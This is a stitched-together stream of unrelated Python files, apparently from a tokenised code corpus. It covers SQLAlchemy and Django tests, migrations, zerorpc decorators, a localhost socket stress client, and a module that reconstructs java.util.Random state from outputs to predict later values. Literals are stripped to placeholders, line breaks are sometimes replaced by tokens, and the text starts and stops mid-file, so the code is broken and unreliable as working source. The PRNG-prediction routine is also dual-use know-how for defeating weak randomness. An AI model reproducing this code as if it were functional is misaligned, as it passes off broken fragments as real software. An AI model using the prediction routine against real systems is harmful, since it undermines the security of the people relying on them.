Boolean ) <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for <EOL> entry in select ( [ expr ] ) . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> def test_plain_exists_negate ( self ) : <EOL> expr = ~ exists ( [ <NUM_LIT:1> ] ) <EOL> eq_ ( type ( expr . 
type ) , Boolean ) <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for <EOL> entry in select ( [ expr ] ) . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> def test_plain_exists_double_negate ( self ) : <EOL> expr = ~ ( ~ exists ( [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( type ( expr . type ) , Boolean ) <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for <EOL> entry in select ( [ expr ] ) . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> def test_column_subquery_plain ( self ) : <EOL> t = self . _fixture ( ) <EOL> s1 = select ( [ t . c . x ] ) . where ( t . c . x > <NUM_LIT:5> ) . as_scalar ( ) <EOL> s2 = select ( [ s1 ] ) <EOL> mapping = self . _mapping ( s2 ) <EOL> assert t . c . x not in mapping <EOL> assert s1 in mapping <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for entry in s2 . compile ( ) . _result_columns ] , <EOL> [ Integer ] <EOL> ) <EOL> def test_unary_boolean ( self ) : <EOL> s1 = select ( [ not_ ( True ) ] , use_labels = True ) <EOL> eq_ ( <EOL> [ type ( entry [ - <NUM_LIT:1> ] ) for entry in s1 . compile ( ) . _result_columns ] , <EOL> [ Boolean ] <EOL> ) <EOL> class ForUpdateTest ( fixtures . TestBase , AssertsCompiledSQL ) : <EOL> __dialect__ = "<STR_LIT:default>" <EOL> def _assert_legacy ( self , leg , read = False , nowait = False ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:c>' ) ) <EOL> s1 = select ( [ t ] , for_update = leg ) <EOL> if leg is False : <EOL> assert s1 . _for_update_arg is None <EOL> assert s1 . for_update is None <EOL> else : <EOL> eq_ ( <EOL> s1 . _for_update_arg . read , read <EOL> ) <EOL> eq_ ( <EOL> s1 . _for_update_arg . nowait , nowait <EOL> ) <EOL> eq_ ( s1 . for_update , leg ) <EOL> def test_false_legacy ( self ) : <EOL> self . _assert_legacy ( False ) <EOL> def test_plain_true_legacy ( self ) : <EOL> self . _assert_legacy ( True ) <EOL> def test_read_legacy ( self ) : <EOL> self . 
_assert_legacy ( "<STR_LIT>" , read = True ) <EOL> def test_nowait_legacy ( self ) : <EOL> self . _assert_legacy ( "<STR_LIT>" , nowait = True ) <EOL> def test_read_nowait_legacy ( self ) : <EOL> self . _assert_legacy ( "<STR_LIT>" , read = True , nowait = True ) <EOL> def test_legacy_setter ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:c>' ) ) <EOL> s = select ( [ t ] ) <EOL> s . for_update = '<STR_LIT>' <EOL> eq_ ( s . _for_update_arg . nowait , True ) <EOL> def test_basic_clone ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:c>' ) ) <EOL> s = select ( [ t ] ) . with_for_update ( read = True , of = t . c . c ) <EOL> s2 = visitors . ReplacingCloningVisitor ( ) . traverse ( s ) <EOL> assert s2 . _for_update_arg is not s . _for_update_arg <EOL> eq_ ( s2 . _for_update_arg . read , True ) <EOL> eq_ ( s2 . _for_update_arg . of , [ t . c . c ] ) <EOL> self . assert_compile ( s2 , <EOL> "<STR_LIT>" , <EOL> dialect = "<STR_LIT>" ) <EOL> def test_adapt ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:c>' ) ) <EOL> s = select ( [ t ] ) . with_for_update ( read = True , of = t . c . c ) <EOL> a = t . alias ( ) <EOL> s2 = sql_util . ClauseAdapter ( a ) . traverse ( s ) <EOL> eq_ ( s2 . _for_update_arg . of , [ a . c . c ] ) <EOL> self . assert_compile ( s2 , <EOL> "<STR_LIT>" , <EOL> dialect = "<STR_LIT>" ) </s>
from weblayer.template import MakoTemplateRenderer


class Renderer(MakoTemplateRenderer):
    """Mako renderer that forces one constructor option to ``None``.

    Everything else is delegated unchanged to ``MakoTemplateRenderer``.
    """

    def __init__(self, *args, **kwargs):
        # Unconditionally override this keyword before delegating; callers
        # cannot opt back in.
        kwargs.update({'<STR_LIT>': None})
        super(Renderer, self).__init__(*args, **kwargs)
import inspect

from .patterns import *


class DecoratorBase(object):
    """Callable wrapper that tags a function with a zerorpc message pattern.

    Subclasses set ``pattern``; the wrapper forwards calls, preserves the
    wrapped callable's name/docstring, and exposes introspection helpers
    used by the zerorpc layer.
    """

    pattern = None

    def __init__(self, functor):
        self._functor = functor
        # Mirror identity metadata so the wrapper is transparent.
        self.__doc__ = functor.__doc__
        self.__name__ = functor.__name__

    def __get__(self, instance, type_instance=None):
        """Rebind on attribute access so decorated methods stay bound."""
        if instance is None:
            return self
        bound = self._functor.__get__(instance, type_instance)
        return self.__class__(bound)

    def __call__(self, *args, **kargs):
        return self._functor(*args, **kargs)

    def _zerorpc_doc(self):
        """Return the cleaned docstring of the wrapped callable, or None."""
        doc = self.__doc__
        if doc is None:
            return None
        return inspect.cleandoc(doc)

    def _zerorpc_args(self):
        """Best-effort argspec of the wrapped callable.

        Prefers the wrapped object's own ``_zerorpc_args``; otherwise
        introspects it (or its ``__call__``) directly, returning None when
        no argspec can be obtained.
        """
        try:
            return self._functor._zerorpc_args()
        except AttributeError:
            pass
        try:
            return inspect.getargspec(self._functor)
        except TypeError:
            pass
        try:
            return inspect.getargspec(self._functor.__call__)
        except (AttributeError, TypeError):
            return None


class rep(DecoratorBase):
    pattern = ReqRep()


class stream(DecoratorBase):
    pattern = ReqStream()
"""<STR_LIT>"""

from django.test import TestCase


class HeaderTests(TestCase):
    """Shared assertions about HTTP headers on Django responses."""

    def check_content_type_header(self, response):
        """Assert the response carries the expected Content-Type header."""
        # NOTE(review): reads Django's private ``response._headers`` mapping.
        actual = response._headers.get('<STR_LIT>')
        self.assertEqual(actual, ('<STR_LIT:Content-Type>', '<STR_LIT>'))

    def check_security_headers(self, response):
        """Assert the three expected security headers are present."""
        headers = response._headers
        self.assertEqual(headers.get('<STR_LIT>'), ('<STR_LIT>', '<STR_LIT>'))
        self.assertEqual(headers.get('<STR_LIT>'), ('<STR_LIT>', '<STR_LIT>'))
        self.assertEqual(headers.get('<STR_LIT>'), ('<STR_LIT>', '<STR_LIT>'))
from collections import Counter

from hippybot.decorators import botcmd


class Plugin(object):
    """<STR_LIT>"""

    global_commands = ['<STR_LIT>', '<STR_LIT>']
    command_aliases = {'<STR_LIT>': '<STR_LIT>'}
    # NOTE: class-level Counter — the per-channel tallies are shared by all
    # Plugin instances.
    counts = Counter()

    @botcmd
    def wave(self, mess, args):
        """<STR_LIT>"""
        channel = unicode(mess.getFrom()).split('<STR_LIT:/>')[0]
        self.bot.log.info("<STR_LIT>" % self.counts[channel])
        if self.bot.from_bot(mess):
            return
        self.counts[channel] += 1
        # Every third human message in a channel triggers the reply and
        # resets that channel's tally.
        if self.counts[channel] == 3:
            self.counts[channel] = 0
            return r'<STR_LIT>'
from dateutil.relativedelta import relativedelta
from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
from django.db.models import Count
from django.utils.timezone import now


class Command(BaseCommand):
    """<STR_LIT>"""

    help = "<STR_LIT>"
    output_transaction = True

    def handle(self, *args, **kwargs):
        """Delete users with zero annotated articles whose last login is at
        least one month old, reporting each deletion and a final count."""
        cutoff = now() - relativedelta(months=1)
        stale_users = list(
            User.objects
            .annotate(num_articles=Count('<STR_LIT>'))
            .filter(num_articles=0, last_login__lte=cutoff)
        )
        for user in stale_users:
            user.delete()
            self.stdout.write('<STR_LIT>' % user)
        self.stdout.write("<STR_LIT>" % len(stale_users))
from django.shortcuts import render

from twobuntu.articles.models import Article
from twobuntu.categories.models import Category
from twobuntu.decorators import canonical


@canonical(Category)
def view(request, category):
    """<STR_LIT>"""
    # Only published articles in this category, with related rows prefetched.
    articles = Article.objects.select_related(
        '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'
    ).filter(category=category, status=Article.PUBLISHED)
    context = {
        '<STR_LIT:title>': category.name,
        '<STR_LIT>': category,
        '<STR_LIT>': articles,
    }
    return render(request, '<STR_LIT>', context)
from django.db import models
from django.utils.encoding import python_2_unicode_compatible

from twobuntu.utils import uuid6


@python_2_unicode_compatible
class ShortURL(models.Model):
    """<STR_LIT>"""

    # Six-character primary key, generated by uuid6 by default.
    key = models.CharField(
        max_length=6,
        primary_key=True,
        default=uuid6,
    )
    # Destination the short key expands to.
    url = models.URLField(help_text="<STR_LIT>")

    def __str__(self):
        return self.url
"""<STR_LIT>"""

import os

from six import StringIO

from django import conf
from django.conf import LazySettings

_DJANGO_SETTINGS_MODULE = "<STR_LIT>"

os.environ['<STR_LIT>'] = _DJANGO_SETTINGS_MODULE


class BaseDjangoTestCase(object):

    def setup(self):
        self.__reset_settings()

    def teardown(self):
        self.__reset_settings()

    @staticmethod
    def __reset_settings():
        # Restore the settings module variable and replace the (possibly
        # configured) settings object with a pristine lazy one.
        os.environ['<STR_LIT>'] = _DJANGO_SETTINGS_MODULE
        conf.settings = LazySettings()


class MockApp(object):
    """<STR_LIT>"""

    def __init__(self, status, headers):
        self.status = status
        self.headers = headers

    def __call__(self, environ, start_response):
        self.environ = environ
        start_response(self.status, self.headers)
        return ["<STR_LIT:body>"]


class MockGeneratorApp(MockApp):
    """<STR_LIT>"""

    def __call__(self, environ, start_response):
        self.environ = environ
        start_response(self.status, self.headers)

        def gen():
            yield "<STR_LIT:body>"
            yield "<STR_LIT>"
            yield "<STR_LIT>"

        return gen()


class MockWriteApp(MockApp):
    """<STR_LIT>"""

    def __call__(self, environ, start_response):
        self.environ = environ
        write = start_response(self.status, self.headers)
        write("<STR_LIT:body>")
        write("<STR_LIT>")
        write("<STR_LIT>")
        return []


class MockClosingApp(MockApp):
    """<STR_LIT>"""

    def __init__(self, *args, **kwargs):
        super(MockClosingApp, self).__init__(*args, **kwargs)
        self.app_iter = ClosingAppIter()

    def __call__(self, environ, start_response):
        body = super(MockClosingApp, self).__call__(environ, start_response)
        self.app_iter.extend(body)
        return self.app_iter


class ClosingAppIter(list):
    """<STR_LIT>"""

    def __init__(self, *args, **kwargs):
        super(ClosingAppIter, self).__init__(*args, **kwargs)
        self.closed = False

    def close(self):
        # Record that the WSGI server closed the iterable.
        self.closed = True


def complete_environ(**environ):
    """<STR_LIT>"""
    # Start from a minimal-but-valid WSGI environ, then let keyword
    # arguments override any default.
    defaults = {
        '<STR_LIT>': "<STR_LIT:GET>",
        '<STR_LIT>': "<STR_LIT>",
        '<STR_LIT>': "<STR_LIT>",
        '<STR_LIT>': "<STR_LIT>",
        '<STR_LIT>': "<STR_LIT>",
        '<STR_LIT>': StringIO("<STR_LIT>"),
        '<STR_LIT>': "<STR_LIT:http>",
    }
    defaults.update(environ)
    return defaults
import logging

log = logging.getLogger(__name__)

# Metric handler names exposed to callers (value, label) pairs.
HANDLER_CHOICES = (
    ('<STR_LIT:count>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>')
)


def _mean_seconds(data, get_delta):
    """Truncated mean of ``get_delta(issue).total_seconds()`` over *data*.

    Returns 0 for an empty sequence instead of raising ZeroDivisionError.
    Shared by cycletime() and leadtime(), which previously duplicated
    this averaging loop verbatim.
    """
    if not data:
        return 0
    total = sum(get_delta(issue).total_seconds() for issue in data)
    return int(total / len(data))


def count(data):
    """Return the number of issues in *data*."""
    return len(data)


def cycletime(data):
    """Average cycle time of *data* in whole seconds (0 when empty)."""
    return _mean_seconds(data, lambda issue: issue.get_cycle_time())


def leadtime(data):
    """Average lead time of *data* in whole seconds (0 when empty)."""
    return _mean_seconds(data, lambda issue: issue.get_lead_time())
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import datetime <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . URLField ( default = None , null = True , blank = True ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . DateTimeField ( default = datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) , auto_now_add = True ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
        ('<STR_LIT>', '<STR_LIT>'),
    ]

    operations = [
        # Add a text column with an explicit (kept) default so existing
        # rows are backfilled.
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.TextField(verbose_name='<STR_LIT>', default='<STR_LIT>'),
            preserve_default=True,
        ),
    ]
from setuptools import setup
from setuptools import find_packages
from os.path import join, dirname

import threebot as app


def long_description():
    """Read the long-description file, or return a fallback if unreadable."""
    try:
        # Context manager closes the handle (the original leaked it).
        with open(join(dirname(__file__), '<STR_LIT>')) as handle:
            return handle.read()
    except IOError:
        return "<STR_LIT>"


def _install_requires():
    """Read install requirements, one requirement per line."""
    with open('<STR_LIT>') as handle:
        return handle.read().split('\n')


setup(
    name="<STR_LIT>",
    version=app.__version__,
    description="<STR_LIT>",
    long_description=long_description(),
    author='<STR_LIT>',
    author_email="<STR_LIT>",
    maintainer_email="<STR_LIT>",
    packages=find_packages(),
    include_package_data=True,
    install_requires=_install_requires(),
)
import flask
import traceback


class ApiError(Exception):
    """API exception carrying an HTTP status and a JSON-style error body."""

    def __init__(self, status_code, *errors):
        self.status_code = status_code
        self.body = {
            '<STR_LIT>': errors
        }
        # In debug mode, attach the active traceback to ease diagnosis.
        if flask.current_app.debug:
            self.body['<STR_LIT>'] = traceback.format_exc()

    def update(self, additional):
        """Merge *additional* keys into every recorded error; returns self."""
        for error in self.body['<STR_LIT>']:
            error.update(additional)
        return self
<s> from flask_resty import Api , filter_function , Filtering , GenericModelView <EOL> from marshmallow import fields , Schema <EOL> import operator <EOL> import pytest <EOL> from sqlalchemy import Column , Integer , String <EOL> import helpers <EOL> @ pytest . yield_fixture <EOL> def models ( db ) : <EOL> class Widget ( db . Model ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> color = Column ( String ) <EOL> size = Column ( Integer ) <EOL> db . create_all ( ) <EOL> yield { <EOL> '<STR_LIT>' : Widget , <EOL> } <EOL> db . drop_all ( ) <EOL> @ pytest . fixture <EOL> def schemas ( ) : <EOL> class WidgetSchema ( Schema ) : <EOL> id = fields . Integer ( as_string = True ) <EOL> color = fields . String ( ) <EOL> size = fields . Integer ( ) <EOL> return { <EOL> '<STR_LIT>' : WidgetSchema ( ) , <EOL> } <EOL> @ pytest . fixture <EOL> def filter_fields ( ) : <EOL> @ filter_function ( fields . Boolean ( ) ) <EOL> def filter_size_is_odd ( model , value ) : <EOL> return model . size % <NUM_LIT:2> == int ( value ) <EOL> return { <EOL> '<STR_LIT>' : filter_size_is_odd <EOL> } <EOL> @ pytest . fixture ( autouse = True ) <EOL> def routes ( app , models , schemas , filter_fields ) : <EOL> class WidgetListView ( GenericModelView ) : <EOL> model = models [ '<STR_LIT>' ] <EOL> schema = schemas [ '<STR_LIT>' ] <EOL> filtering = Filtering ( <EOL> color = operator . eq , <EOL> size_min = ( '<STR_LIT:size>' , operator . ge ) , <EOL> size_divides = ( '<STR_LIT:size>' , lambda size , value : size % value == <NUM_LIT:0> ) , <EOL> size_is_odd = filter_fields [ '<STR_LIT>' ] , <EOL> ) <EOL> def get ( self ) : <EOL> return self . list ( ) <EOL> api = Api ( app ) <EOL> api . add_resource ( '<STR_LIT>' , WidgetListView ) <EOL> @ pytest . fixture ( autouse = True ) <EOL> def data ( db , models ) : <EOL> db . session . 
add_all ( ( <EOL> models [ '<STR_LIT>' ] ( color = '<STR_LIT>' , size = <NUM_LIT:1> ) , <EOL> models [ '<STR_LIT>' ] ( color = '<STR_LIT>' , size = <NUM_LIT:2> ) , <EOL> models [ '<STR_LIT>' ] ( color = '<STR_LIT>' , size = <NUM_LIT:3> ) , <EOL> models [ '<STR_LIT>' ] ( color = '<STR_LIT>' , size = <NUM_LIT:6> ) , <EOL> ) ) <EOL> db . session . commit ( ) <EOL> def test_eq ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . get_data ( response ) == [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:1> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:6> , <EOL> } , <EOL> ] <EOL> def test_eq_many ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . get_data ( response ) == [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:2> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:3> , <EOL> } , <EOL> ] <EOL> def test_ge ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . get_data ( response ) == [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:3> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:6> , <EOL> } , <EOL> ] <EOL> def test_custom_operator ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . 
get_data ( response ) == [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:2> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:6> , <EOL> } , <EOL> ] <EOL> def test_filter_field ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . get_data ( response ) == [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:1> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:3> , <EOL> } , <EOL> ] <EOL> def test_error_invalid_field ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert response . status_code == <NUM_LIT> <EOL> errors = helpers . get_errors ( response ) <EOL> for error in errors : <EOL> assert error . pop ( '<STR_LIT>' , None ) is not None <EOL> assert errors == [ { <EOL> '<STR_LIT:code>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> } ] </s>
import logging

log = logging.getLogger(__name__)


class Middleware(object):
    """Abstract request/response hook pair.

    Subclasses must override both methods; the base implementations
    always raise NotImplementedError.
    """

    def process_request(self, env, url, data, **kwargs):
        """Hook invoked before a request is sent; must be overridden."""
        raise NotImplementedError

    def process_response(self, env, response):
        """Hook invoked after a response arrives; must be overridden."""
        raise NotImplementedError
from pytest import raises
import pytest

from epo_ops.exceptions import InvalidDate
from epo_ops.utils import quote, validate_date


def test_encoding():
    # Implicit string concatenation keeps the long expected value readable.
    expected = (
        '<STR_LIT>'
        '<STR_LIT>'
    )
    assert quote('<STR_LIT>') == expected


def test_valid_date():
    assert validate_date('<STR_LIT>') == '<STR_LIT>'


def test_invalid_date():
    with raises(InvalidDate):
        validate_date('abc')
    with raises(InvalidDate):
        validate_date('<STR_LIT>')


if __name__ == '__main__':
    pytest.main()
'''<STR_LIT>'''

from firefly.utils.singleton import Singleton


class MAdminManager:
    """Singleton registry of admin objects, keyed by their ``_name``."""

    # Python 2 style singleton metaclass (ignored by Python 3 class syntax).
    __metaclass__ = Singleton

    def __init__(self):
        """Create an empty registry."""
        self.admins = {}

    def registe(self, admin):
        """Register *admin* under its ``_name`` attribute."""
        self.admins[admin._name] = admin

    def dropAdmin(self, adminname):
        """Remove the admin registered as *adminname*, if present."""
        # `in` replaces dict.has_key(), which was removed in Python 3;
        # behavior is identical on Python 2.
        if adminname in self.admins:
            del self.admins[adminname]

    def getAdmin(self, adminname):
        """Return the admin registered as *adminname*, or None."""
        return self.admins.get(adminname)

    def checkAdmins(self):
        """Invoke ``checkAll()`` on every registered admin."""
        for admin in self.admins.values():
            admin.checkAll()
<s> '''<STR_LIT>''' <EOL> import time <EOL> from socket import AF_INET , SOCK_STREAM , socket <EOL> from thread import start_new <EOL> import struct <EOL> HOST = '<STR_LIT:localhost>' <EOL> PORT = <NUM_LIT:1000> <EOL> BUFSIZE = <NUM_LIT> <EOL> ADDR = ( HOST , PORT ) <EOL> client = socket ( AF_INET , SOCK_STREAM ) <EOL> client . connect ( ADDR ) <EOL> def sendData ( sendstr , commandId ) : <EOL> HEAD_0 = chr ( <NUM_LIT:0> ) <EOL> HEAD_1 = chr ( <NUM_LIT:0> ) <EOL> HEAD_2 = chr ( <NUM_LIT:0> ) <EOL> HEAD_3 = chr ( <NUM_LIT:0> ) <EOL> ProtoVersion = chr ( <NUM_LIT:0> ) <EOL> ServerVersion = <NUM_LIT:0> <EOL> sendstr = sendstr <EOL> data = struct . pack ( '<STR_LIT>' , HEAD_0 , HEAD_1 , HEAD_2 , HEAD_3 , ProtoVersion , ServerVersion , len ( sendstr ) + <NUM_LIT:4> , commandId ) <EOL> senddata = data + sendstr <EOL> return senddata <EOL> def resolveRecvdata ( data ) : <EOL> head = struct . unpack ( '<STR_LIT>' , data [ : <NUM_LIT> ] ) <EOL> length = head [ <NUM_LIT:6> ] <EOL> data = data [ <NUM_LIT> : <NUM_LIT> + length ] <EOL> return data <EOL> s1 = time . time ( ) <EOL> def start ( ) : <EOL> for i in xrange ( <NUM_LIT:10> ) : <EOL> client . sendall ( sendData ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> start_new ( start , ( ) ) <EOL> while True : <EOL> pass </s>
"""<STR_LIT>"""

from ctypes import c_int32, c_int64, c_uint64
from foresight import java
from foresight.java import next_bits
from itertools import combinations

__all__ = [
    "<STR_LIT>",
    "<STR_LIT>"
]


def _emit_longs(bits_gen):
    """Fold pairs of 32-bit outputs into Java-style signed 64-bit longs."""
    while True:
        value = c_int64(next(bits_gen) << 32).value
        value += c_int32(next(bits_gen)).value
        yield c_int64(value).value


def from_seed(seed):
    """Yield the long sequence produced from a known 48-bit seed."""
    # Plain loop (not `yield from`) keeps Python 2 compatibility.
    for value in _emit_longs(java.next_bits.from_seed(seed, 32)):
        yield value


def from_outputs(outputs):
    """Recover the generator state from observed longs, then yield
    subsequent values. Raises RuntimeError when no state fits."""
    halves = []
    for output in outputs:
        unsigned = c_uint64(output).value
        halves.append(unsigned >> 32)
        halves.append(unsigned & ((1 << 32) - 1))

    state = java.next_bits.predict_state(halves)

    # If no state fits directly, retry with every subset of the high words
    # incremented by one — presumably compensating for a carry between the
    # two halves; TODO confirm against the foresight internals.
    for subset_size in range(1, len(halves) // 2 + 1):
        if state:
            break
        for positions in combinations(range(0, len(halves), 2), subset_size):
            candidate = halves[:]
            for position in positions:
                candidate[position] += 1
            state = java.next_bits.predict_state(candidate)
            if state:
                break

    if state is None:
        raise RuntimeError("<STR_LIT>")

    for value in _emit_longs(java.next_bits.generate_values(state, 32)):
        yield value
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function <EOL> from time import time <EOL> import os <EOL> import re <EOL> import shutil <EOL> import traceback <EOL> import glob <EOL> import sys <EOL> import gzip <EOL> import posixpath <EOL> try : <EOL> from StringIO import StringIO <EOL> import cPickle as pickle <EOL> import urllib2 as urllib <EOL> from urllib2 import HTTPError , URLError <EOL> except : <EOL> from io import StringIO <EOL> import pickle <EOL> import urllib . request <EOL> import urllib . error <EOL> import urllib . parse <EOL> from urllib . error import HTTPError , URLError <EOL> try : <EOL> execfile <EOL> except NameError : <EOL> def execfile ( filename , global_vars = None , local_vars = None ) : <EOL> with open ( filename , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> code = compile ( f . read ( ) , filename , '<STR_LIT>' ) <EOL> exec ( code , global_vars , local_vars ) <EOL> try : <EOL> basestring <EOL> except NameError : <EOL> basestring = str <EOL> try : <EOL> from PIL import Image <EOL> except : <EOL> import Image <EOL> import matplotlib <EOL> matplotlib . use ( '<STR_LIT>' ) <EOL> import token <EOL> import tokenize <EOL> import numpy as np <EOL> class Tee ( object ) : <EOL> def __init__ ( self , file1 , file2 ) : <EOL> self . file1 = file1 <EOL> self . file2 = file2 <EOL> def write ( self , data ) : <EOL> self . file1 . write ( data ) <EOL> self . file2 . write ( data ) <EOL> def flush ( self ) : <EOL> self . file1 . flush ( ) <EOL> self . file2 . flush ( ) <EOL> def get_data ( url ) : <EOL> """<STR_LIT>""" <EOL> if url . startswith ( '<STR_LIT>' ) : <EOL> resp = urllib . urlopen ( url ) <EOL> encoding = resp . headers . dict . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data = resp . read ( ) <EOL> if encoding == '<STR_LIT>' : <EOL> pass <EOL> elif encoding == '<STR_LIT>' : <EOL> data = StringIO ( data ) <EOL> data = gzip . GzipFile ( fileobj = data ) . 
read ( ) <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> else : <EOL> with open ( url , '<STR_LIT:r>' ) as fid : <EOL> data = fid . read ( ) <EOL> fid . close ( ) <EOL> return data <EOL> def parse_sphinx_searchindex ( searchindex ) : <EOL> """<STR_LIT>""" <EOL> def _select_block ( str_in , start_tag , end_tag ) : <EOL> """<STR_LIT>""" <EOL> start_pos = str_in . find ( start_tag ) <EOL> if start_pos < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> depth = <NUM_LIT:0> <EOL> for pos in range ( start_pos , len ( str_in ) ) : <EOL> if str_in [ pos ] == start_tag : <EOL> depth += <NUM_LIT:1> <EOL> elif str_in [ pos ] == end_tag : <EOL> depth -= <NUM_LIT:1> <EOL> if depth == <NUM_LIT:0> : <EOL> break <EOL> sel = str_in [ start_pos + <NUM_LIT:1> : pos ] <EOL> return sel <EOL> def _parse_dict_recursive ( dict_str ) : <EOL> """<STR_LIT>""" <EOL> dict_out = dict ( ) <EOL> pos_last = <NUM_LIT:0> <EOL> pos = dict_str . find ( '<STR_LIT::>' ) <EOL> while pos >= <NUM_LIT:0> : <EOL> key = dict_str [ pos_last : pos ] <EOL> if dict_str [ pos + <NUM_LIT:1> ] == '<STR_LIT:[>' : <EOL> pos_tmp = dict_str . find ( '<STR_LIT:]>' , pos + <NUM_LIT:1> ) <EOL> if pos_tmp < <NUM_LIT:0> : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> value = dict_str [ pos + <NUM_LIT:2> : pos_tmp ] . split ( '<STR_LIT:U+002C>' ) <EOL> for i in range ( len ( value ) ) : <EOL> try : <EOL> value [ i ] = int ( value [ i ] ) <EOL> except ValueError : <EOL> pass <EOL> elif dict_str [ pos + <NUM_LIT:1> ] == '<STR_LIT:{>' : <EOL> subdict_str = _select_block ( dict_str [ pos : ] , '<STR_LIT:{>' , '<STR_LIT:}>' ) <EOL> value = _parse_dict_recursive ( subdict_str ) <EOL> pos_tmp = pos + len ( subdict_str ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> key = key . strip ( '<STR_LIT:">' ) <EOL> if len ( key ) > <NUM_LIT:0> : <EOL> dict_out [ key ] = value <EOL> pos_last = dict_str . 
